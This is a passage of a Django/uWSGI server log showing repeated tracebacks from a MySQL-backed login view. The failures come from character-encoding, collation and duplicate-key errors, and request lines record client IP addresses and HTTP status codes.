"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 753/991] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:33:38 2021] POST /login/ => generated 209951 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 754/992] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:33:57 2021] POST /login/ => generated 209870 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 755/993] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:04 2021] POST /login/ => generated 183377 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 756/994] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:15 2021] POST /login/ => generated 209870 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 757/995] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:16 2021] POST /login/ => generated 183377 bytes in 97 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 758/996] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:36:17 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 759/997] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:36:18 2021] GET /home/ => generated 7863 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File 